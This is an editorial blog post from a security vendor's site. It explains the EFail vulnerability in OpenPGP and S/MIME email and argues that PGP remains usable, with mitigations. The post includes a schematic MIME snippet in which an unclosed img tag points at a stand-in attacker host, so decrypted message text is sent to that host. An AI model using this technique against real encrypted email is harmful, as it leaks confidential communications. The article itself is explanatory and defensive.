• Articles
    • Editorial Articles
    • Research Articles
    • WatchGuard Articles
  • The 443 Podcast
  • Threat Landscape
  • About
    • About Us
    • Contact Us
    • Contribute to Secplicity

Secplicity - Security Simplified

Powered by WatchGuard Technologies

EFail, “No One is Safe Using Email”

June 7, 2018 By Trevor Collins

Time bomb inside envelope

“Email is a plaintext communication medium whose communication paths are partly protected by TLS. For people in hostile environments (journalists, political activists, whistleblowers, …) who depend on the confidentiality of digital communication, this may not be enough.”

This is according to a researcher on the EFail website, who goes on to describe how this vulnerability exploits OpenPGP and S/MIME. Unless you are familiar with this type of encryption, it would be easy to assume that PGP is no longer safe. Some have gone a step further and even recommended not using PGP. This is not necessarily good advice as PGP is still secure. For some, TLS encryption is not enough to safeguard their emails. You would have to distrust the email server you are using or the certificates on the server. Nation-state actors are one of the few groups – perhaps the only group – that would possibly be able to view an email when the server uses TLS unless the server/client you are sending the email to is compromised. (Note: TLS is not compromised by EFail in any way)

OpenPGP and S/MIME are vulnerable to EFail and I am not trying to downplay this. Adding a hyperlink in the email parts that are not encrypted causes the encrypted part to be linked to a website. The email data would look like this.

 


Unencrypted content for routing email
-Encryption boundary-
Content-Type: text/html

<img src=https:// NationstateActor.com/

-Encryption boundary-

Content-Type: application/pkcs7-mime;
s-mime-typed-envelope-data
Content-Transfer-Encoding: base64
75c753802038f7e7eb2f659217ebfd8e43c698cdd5e8e3d49aaa5fa3683f9000…

-Encryption boundary-

Content-Type: text/html
">

-Encryption boundary-

 

This creates an image that when loaded in the email client makes a request to https:// NationstateActor.com/SecretMessage.

If you have allowed external content in the email client this would be a concern. The email may be vulnerable If it matches these 4 criteria: .

  • Email doesn’t use or you don’t trust the TLS email server
  • Uses PGP or S/MIME for encryption
  • Uses a client that is vulnerable
  • Enables HTML and allows external content to be loaded from the email

There is a vulnerability here that should be addressed and resolved by an update, but PGP is still secure and can be used to protect emails. If you do use PGP or S/MIME, we recommend you use an external application for decryption, update your client when possible, and be cautious of emails you receive that have external content. –Trevor Collins

Share This:

Related

Filed Under: Editorial Articles Tagged With: Software vulnerabilities

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

The 443 Podcast

A weekly podcast featuring the leading white-hat hackers and security researchers. Listen Now
the 443 podcast

Threat Landscape

Filter and view Firebox Feed data by type of attack, region, country, and date range. View Now
threat landscape

Top Posts

  • Scratching the Surface of Rhysida Ransomware
  • An Interview with ChatGPT
  • TikTok is Banned, Kind Of
  • Naming APTs

Email Newsletter

Sign up to get the latest security news and threat analysis delivered straight to your inbox

By signing up you agree to our Privacy Policy.


The views and opinions expressed on this website are those of the authors and do not necessarily reflect the policy or position of WatchGuard Technologies.

Stay in Touch

Recent Posts

  • How Not to Update Software
  • Naming APTs
  • TikTok is Banned, Kind Of
  • Scratching the Surface of Rhysida Ransomware
  • An Interview with ChatGPT
View All

Search

Archives

Copyright © 2023 WatchGuard Technologies · Cookie Policy · Privacy Policy · Terms of Use